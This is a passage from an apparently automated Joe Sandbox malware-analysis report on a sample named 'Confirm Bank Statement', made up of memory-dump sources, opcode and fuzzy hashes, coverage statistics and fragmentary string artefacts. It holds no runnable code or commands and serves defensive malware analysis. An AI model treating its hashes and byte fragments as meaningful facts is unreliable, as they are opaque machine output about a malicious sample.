                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc490e7ae798c1e1af8058df60e697c77aa61274667e8c566ea0dd1f5a928763
                                                                                              • Instruction ID: 31832ea7141d05832ffc8bb4ca516c7099c83024f4be6531b3a46beed9bbb87d
                                                                                              • Opcode Fuzzy Hash: bc490e7ae798c1e1af8058df60e697c77aa61274667e8c566ea0dd1f5a928763
                                                                                              • Instruction Fuzzy Hash: 9FE0B6B4D14209EFCB54DFA9E54569DBFF4EB49300F1081AA9818A3350EB746E44DF85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0037e81da89fc0d7f1c05513d833af1b83d465ab6c6e372397760f0ac1e8fa12
                                                                                              • Instruction ID: 013b8ef3c794fef9f188e7cdb4ebe0685ab66216a58f659c3f130eda065dfc8d
                                                                                              • Opcode Fuzzy Hash: 0037e81da89fc0d7f1c05513d833af1b83d465ab6c6e372397760f0ac1e8fa12
                                                                                              • Instruction Fuzzy Hash: A7E01236A0110EEBDF01DF80E948BDEBB72FB88315F208011EA01262A0C7724A21DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aee8e0dec4048469ec5a10cf12a39c65b37d4095dee4f07cd75b8df88f5957dd
                                                                                              • Instruction ID: ab220dc4ee365d85fa5919969f80cb7ae63188470e9ed62ac9789b14d13ef214
                                                                                              • Opcode Fuzzy Hash: aee8e0dec4048469ec5a10cf12a39c65b37d4095dee4f07cd75b8df88f5957dd
                                                                                              • Instruction Fuzzy Hash: A1E086B5E0110DEFCB00DFB5E80045CBBB9FB44200B1086A9D805E3314EA3A2F14DB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c3e9bde7e7b3b2f0642a30710396afa655f9c71124333bf294936d828a7a8cb
                                                                                              • Instruction ID: ab80de0d902430808b92b35f03cd9f584f132c2e3a180bd58fd63ae0823fbf91
                                                                                              • Opcode Fuzzy Hash: 3c3e9bde7e7b3b2f0642a30710396afa655f9c71124333bf294936d828a7a8cb
                                                                                              • Instruction Fuzzy Hash: EAE0B674920208EFCB40DFA8D549A5CBBF4EF09611F5041E9D908D7360E770AE40CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a7a42f5048c33929e3fdb1704014f5eb589bd30b9004ad977e0bd648e9c6c4a
                                                                                              • Instruction ID: 6105a37385a1d63547ab8356d786c6da11c6b2a1c0fdb3563c63e863445fa14b
                                                                                              • Opcode Fuzzy Hash: 1a7a42f5048c33929e3fdb1704014f5eb589bd30b9004ad977e0bd648e9c6c4a
                                                                                              • Instruction Fuzzy Hash: ADE0E5B0C15348CFCB008FA8DA5979CBBB0FB06316F008456C80AAB249E7780985CF11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c1ecb7b65adcb8bcbfa6bc327be296abc525f349fe61b9dba1aac9f74a85b74
                                                                                              • Instruction ID: 2b5f863fdbdc0f40cb420a0d8f1074f7710dd7d643d837403baab11d82428d2a
                                                                                              • Opcode Fuzzy Hash: 7c1ecb7b65adcb8bcbfa6bc327be296abc525f349fe61b9dba1aac9f74a85b74
                                                                                              • Instruction Fuzzy Hash: 6AD01776744114CFD7058F78E6098697FE1DB59B2131681A7E509CB3A5CA26CC408B81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 64cf017d7ad653574501db76efcc8d77fed0f2bf684f40972217e97c383ebb3b
                                                                                              • Instruction ID: 5e4e5ba98056478853173e2738746bdc4b3ff52351e4594d5fe309ad64aafccb
                                                                                              • Opcode Fuzzy Hash: 64cf017d7ad653574501db76efcc8d77fed0f2bf684f40972217e97c383ebb3b
                                                                                              • Instruction Fuzzy Hash: 07E092B08083818FC721D768E409A197FA09B03224F0443DFDC918B2E2D7381940C752
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7bcf6ebc6577405ec1647be73c6b2bf92fa3d03452fa2d453350ece3e12d4df7
                                                                                              • Instruction ID: 7881e3fb36579375c38b3ddcc46b5713f3b09f4ffc743aa05f9dd5b22b5d3839
                                                                                              • Opcode Fuzzy Hash: 7bcf6ebc6577405ec1647be73c6b2bf92fa3d03452fa2d453350ece3e12d4df7
                                                                                              • Instruction Fuzzy Hash: 56E0ECB0D10209EFDB54EFA8D54565CBFB4AB05601F1081A9DC0593250EB705A44CB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1386e845803b44a21aed8ab16dd90d620b22b7bb30582b424c351da629b15a94
                                                                                              • Instruction ID: cd94e10cc53a1c438b55fba9d2314996524f032794b5b1f6db187090af5a0784
                                                                                              • Opcode Fuzzy Hash: 1386e845803b44a21aed8ab16dd90d620b22b7bb30582b424c351da629b15a94
                                                                                              • Instruction Fuzzy Hash: C3E01270814208EFCB14DF94E905A9DBF75FB46301F5081ADED0453350DB701E54DB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cd09984a812b2b638054f02974fedc893663432f49123260ad5a1d6f06ae095
                                                                                              • Instruction ID: 35a82b1f627af68f50fb80677dab8e454c2c7af60a73b096327c252035fd2e92
                                                                                              • Opcode Fuzzy Hash: 7cd09984a812b2b638054f02974fedc893663432f49123260ad5a1d6f06ae095
                                                                                              • Instruction Fuzzy Hash: 98E0EC70920209EFCB54DFA8D64579DBFF4AB05201F1045A9980493290EB705A50CB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8415c69033ebf8426ddb45077fda2984fe884a1730f191450b61dd17a087a95f
                                                                                              • Instruction ID: 849a4bbe1b7ef12782df898671b444e77256dcab7690b0c366b1734e037d49c0
                                                                                              • Opcode Fuzzy Hash: 8415c69033ebf8426ddb45077fda2984fe884a1730f191450b61dd17a087a95f
                                                                                              • Instruction Fuzzy Hash: 4BE01236080109EFCB01CF95D849FD637A9FB48220F148451F614C6271C675D8619B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4813d511c8050229d27c99096c955cf76ead27a8c5bfd32a60f8b69d9a235440
                                                                                              • Instruction ID: cc272f9abced41020121b853e3f977bfd187f54c61126eac3f9e2da50cbc2733
                                                                                              • Opcode Fuzzy Hash: 4813d511c8050229d27c99096c955cf76ead27a8c5bfd32a60f8b69d9a235440
                                                                                              • Instruction Fuzzy Hash: 12D05E33A18A0988D701BAA8D0042BCB3A4EFD1201F00865FE44916120EFA0C5D1D281
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 41093cd0250a3f7d7f3a215b9d4b0d74d3e1cc07260c5d27f4e0ad25816a7a68
                                                                                              • Instruction ID: 6ceeca1253a42436235656ab3ada373933c78339904db244d94137be7eb5f758
                                                                                              • Opcode Fuzzy Hash: 41093cd0250a3f7d7f3a215b9d4b0d74d3e1cc07260c5d27f4e0ad25816a7a68
                                                                                              • Instruction Fuzzy Hash: 79C0127364412527E7141059EC1579637CDEB55655F440039E505D3241EA81D90103D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1272556679.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_55b0000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 776b79be9c26e355449cbc7f92c99df42b236a764ed09c704fcea2dfca9b9b82
                                                                                              • Instruction ID: 6a04673bbfa207d811e5280a5470dc6b80bb67167bb96f8d93128b1b449cef3f
                                                                                              • Opcode Fuzzy Hash: 776b79be9c26e355449cbc7f92c99df42b236a764ed09c704fcea2dfca9b9b82
                                                                                              • Instruction Fuzzy Hash: A0D0C9363101249F87049B68E508CA97BEAEB9D6613118066F909CB361CE71DC109BD4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1274399706.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7270000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cfce01a76d52498f57cf1b5773614cea79c8e640f01ac57e49317f8a2e78c18
                                                                                              • Instruction ID: b01032f351a4fb411f3b1f2a6acf88f3f07fad50a0e01a3aaf019864ad8a7449
                                                                                              • Opcode Fuzzy Hash: 0cfce01a76d52498f57cf1b5773614cea79c8e640f01ac57e49317f8a2e78c18

                                                                                              Execution Graph

                                                                                              Execution Coverage:12.4%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:20.8%
                                                                                              Total number of Nodes:48
                                                                                              Total number of Limit Nodes:4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (oq$(oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                              • API String ID: 0-746337618
                                                                                              • Opcode ID: 655447af8acfdb1c72f93435f6357662c2ccfe0f6e83660b178298c723780328
                                                                                              • Instruction ID: 875167ac3012637efb4c841943b5aa813031d64f97dae20e2145020618f68220
                                                                                              • Opcode Fuzzy Hash: 655447af8acfdb1c72f93435f6357662c2ccfe0f6e83660b178298c723780328
                                                                                              • Instruction Fuzzy Hash: 84825D38A00609DFDB14CF68C984AAEBBF2FF88315F158559E849EB2A5D730ED41CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (oq$(oq$(oq$,q$,q$Hq
                                                                                              • API String ID: 0-894188343
                                                                                              • Opcode ID: 56cf9b73c3cb7d5a6494451a900a9cd1ddaf7cebe2b8f7970641d06ccd612711
                                                                                              • Instruction ID: bbdffe406986607bc0a77dc8979ae2e64d556ce09a52da990f3167915ca051ad
                                                                                              • Opcode Fuzzy Hash: 56cf9b73c3cb7d5a6494451a900a9cd1ddaf7cebe2b8f7970641d06ccd612711
                                                                                              • Instruction Fuzzy Hash: D2726079A002199FDB14DF69C884AAEBBF6FF88304F148569E819DB365DB30ED41CB50

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PHq$PHq
                                                                                              • API String ID: 0-1274609152
                                                                                              • Opcode ID: 76c6ed7e2d0b9d70b941d372ef0a1152b99f65ae29213bd2ba303c4356cef9df
                                                                                              • Instruction ID: 036f361d56d1f625f309c56bc717b09a446e7cec61e9b5adec80f91557eb08a3
                                                                                              • Opcode Fuzzy Hash: 76c6ed7e2d0b9d70b941d372ef0a1152b99f65ae29213bd2ba303c4356cef9df
                                                                                              • Instruction Fuzzy Hash: 9B81B078E0021CCFDB58DFAAD99479DBBB2BF89304F20816AD419AB354DB349946CF50

                                                                                              Control-flow Graph

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3719114942.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_b50000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1d37f1eb358904a4a15e3bcebbbbf34ea9e961ca9312d1b4991786c97cc2518
                                                                                              • Instruction ID: 972e03e4897e1449328c53677a38dbe84c3064ea6f6dde66f1e2e45512713843
                                                                                              • Opcode Fuzzy Hash: f1d37f1eb358904a4a15e3bcebbbbf34ea9e961ca9312d1b4991786c97cc2518
                                                                                              • Instruction Fuzzy Hash: 4922F674E003188FDB14DFA9C884B9DBBF2BF88305F1481A9D849AB395DB759D86CB50

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,q$,q
                                                                                              • API String ID: 0-1667412543
                                                                                              • Opcode ID: 41900760fe29be126044c88c95afb2bd6abc335b8a10b6cc594548d9fdff093c
                                                                                              • Instruction ID: 06be4ae0f493e173bf9178580086c1d89ca1fb20ee5633c6cb40bd9ce93fc418
                                                                                              • Opcode Fuzzy Hash: 41900760fe29be126044c88c95afb2bd6abc335b8a10b6cc594548d9fdff093c
                                                                                              • Instruction Fuzzy Hash: A381A33CA00925CFCB14CF69C484A6EB7BABF89358B548169D41AD7365EB31EC41CF91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (&q$(q
                                                                                              • API String ID: 0-2464455664
                                                                                              • Opcode ID: 38b3c95148da316acf1deda2089b6120b7c1a23f7415190ddf7198cd38090c16
                                                                                              • Instruction ID: 6225c028a95913beab1705a6a7b07b772277e38858a8aee895123846e9b630ee
                                                                                              • Opcode Fuzzy Hash: 38b3c95148da316acf1deda2089b6120b7c1a23f7415190ddf7198cd38090c16
                                                                                              • Instruction Fuzzy Hash: C071A235F002189BDB15DBB5D8507AE7BB2AFC4700F148129E406E7395DF349D46C795

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hq$Hq
                                                                                              • API String ID: 0-925789375
                                                                                              • Opcode ID: 1000652a4a295e0b1c71743520ccd00dfb6f7310bb0efcc801fc63da4fe4c4de
                                                                                              • Instruction ID: bb25af3e9779cd075cdf0a1d21f9b55afbf08c898d5cee9f6a4fe55062e8d1ed
                                                                                              • Opcode Fuzzy Hash: 1000652a4a295e0b1c71743520ccd00dfb6f7310bb0efcc801fc63da4fe4c4de
                                                                                              • Instruction Fuzzy Hash: 9C51E33D7046259FDB158F64D854BAE7BFAFF88304F094929E859CB291EB34C841CBA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 00B5C8AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3719114942.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_b50000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6e715a1f30d6d2152546502f458e160dc3cd384fd4209c5c8a98b1579c540900
                                                                                              • Instruction ID: 6ee66b571af06da2e6f6f02a0e137f9ae4b9ded9e9245dc579a73d67169cd368
                                                                                              • Opcode Fuzzy Hash: 6e715a1f30d6d2152546502f458e160dc3cd384fd4209c5c8a98b1579c540900
                                                                                              • Instruction Fuzzy Hash: 64112974E002099FDB04DBA8D884BADBBF6FB88306F6481A5E944E7242D771AD45CB64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (oq
                                                                                              • API String ID: 0-1999159160
                                                                                              • Opcode ID: 452737f24d8649c1aa8ca0982a3683bb67e9cd1aca431f5546b6a00a6d457cdd
                                                                                              • Instruction ID: d329aead4898e5c78bc68b754f6d8fdfcdd71bbb9ea9b7d3fd891404a2db1f7b
                                                                                              • Opcode Fuzzy Hash: 452737f24d8649c1aa8ca0982a3683bb67e9cd1aca431f5546b6a00a6d457cdd
                                                                                              • Instruction Fuzzy Hash: 7D41B139B042149FCB149B64D854AAE7BF7BFC8711F148069E90ADB7A1CE35DC02CB95
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d8q
                                                                                              • API String ID: 0-2239850164
                                                                                              • Opcode ID: 83a255990e7be833653482c02231508da30e94d6da87be89d5e432e1d9633d6b
                                                                                              • Instruction ID: 71a7480c9a9410ba6830c8b792c8be0e52f985d8b198ec171f0ba9b958db7bd3
                                                                                              • Opcode Fuzzy Hash: 83a255990e7be833653482c02231508da30e94d6da87be89d5e432e1d9633d6b
                                                                                              • Instruction Fuzzy Hash: 0741E438704B048FD724AB39D854B2A7BE2AF84314F1945ADE85ACF7B1EB24EC06C745
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: 2b6eb616e4a37285681c8f3d5f2e8522f7baa552add1c913d9974d244f72bee2
                                                                                              • Instruction ID: 827b56de55a4d665e493683be1a069b140dba20448eac2fd71042aee619434bd
                                                                                              • Opcode Fuzzy Hash: 2b6eb616e4a37285681c8f3d5f2e8522f7baa552add1c913d9974d244f72bee2
                                                                                              • Instruction Fuzzy Hash: 274128796041199FCB14DF28D848AAE7BB2BF48315F144069F91ACB3B0CB71DD41EBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'q
                                                                                              • API String ID: 0-1807707664
                                                                                              • Opcode ID: 6610a74348e06865461d4993e9256ff622674aa2c1c04e7be3bf17a18a761e42
                                                                                              • Instruction ID: 6dd5f25a222bf9e0107cfd7e2446bb3a1e3b7c692d91cd488e214b17fc68f032
                                                                                              • Opcode Fuzzy Hash: 6610a74348e06865461d4993e9256ff622674aa2c1c04e7be3bf17a18a761e42
                                                                                              • Instruction Fuzzy Hash: 8521F43D70C1599FCB10DF26DC8CA7B7BEAFB85254B148426E916CB245DB71D840EB60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d8q
                                                                                              • API String ID: 0-2239850164
                                                                                              • Opcode ID: bf6226d6a92bfd765cf1c67bb41c6b303377c655fc0401e425e0d2543e4b2cb4
                                                                                              • Instruction ID: f0bcd1d53070edfc804b6f5428860c6d46058e0bc277c09f7dca37066dfd3ab7
                                                                                              • Opcode Fuzzy Hash: bf6226d6a92bfd765cf1c67bb41c6b303377c655fc0401e425e0d2543e4b2cb4
                                                                                              • Instruction Fuzzy Hash: 16112C38700B414FD7319B39D444B5EBBE2AFC0214F088A5DD85ACB561DB64F80A8781
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hq
                                                                                              • API String ID: 0-1594803414
                                                                                              • Opcode ID: e8120ce3855f8cb1d0a623e19f94102f954dce283f2c2af12aace1715e87f2fe
                                                                                              • Instruction ID: d1e9f8e7d533950c7b83c5c4ec68441d15dfc1e9a87f593707b595aa4e6cf9b3
                                                                                              • Opcode Fuzzy Hash: e8120ce3855f8cb1d0a623e19f94102f954dce283f2c2af12aace1715e87f2fe
                                                                                              • Instruction Fuzzy Hash: BB11E136B042089FDF09AF7888515AE7BA3FFD8350B18845AE9099B365CE358906DB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2aa16f58ec20fca6dd537f293d43f7c97a33536496c43dddca4aeb4ac5e0e225
                                                                                              • Instruction ID: 5257c3eb43d367b80576b1e9ee11efc6b03abc1394e6f1a200c4ce921f9a9eef
                                                                                              • Opcode Fuzzy Hash: 2aa16f58ec20fca6dd537f293d43f7c97a33536496c43dddca4aeb4ac5e0e225
                                                                                              • Instruction Fuzzy Hash: 6A71D1387006258FDB199B79C89473EB7AABFC9314B188569D50ACB3A4EF30CC42C791
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c1ac95d17ffdcf1c31aa61dba48e7c433c2ecbfb9212feef140c10ea69e97a1
                                                                                              • Instruction ID: 50ebe647f01eb3137a9188cd6a2b9be981d9c1fd12ea9fd36b439719d719a3c9
                                                                                              • Opcode Fuzzy Hash: 9c1ac95d17ffdcf1c31aa61dba48e7c433c2ecbfb9212feef140c10ea69e97a1
                                                                                              • Instruction Fuzzy Hash: E9518F3D7041159FCB14DF39C89CA6A7BEABF8865470944AAE41ACB372EB31DC01EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_2870000_Confirm Bank Statement.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ca7b0722f45f6bff39852defb2b58594920570c26f735fff1dd9fe7144295add
                                                                                              • Instruction ID: 2c759b64c7c743dedddc9a99a3912792a0563dd404375c9c2dd2bcec07306038
                                                                                              • Opcode Fuzzy Hash: ca7b0722f45f6bff39852defb2b58594920570c26f735fff1dd9fe7144295add
                                                                                              • Instruction Fuzzy Hash: 4D819C74E052289FDB65DF29D995BDDBBB2BB89300F1480EAD80DA7264DB315E81CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.3720525828.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
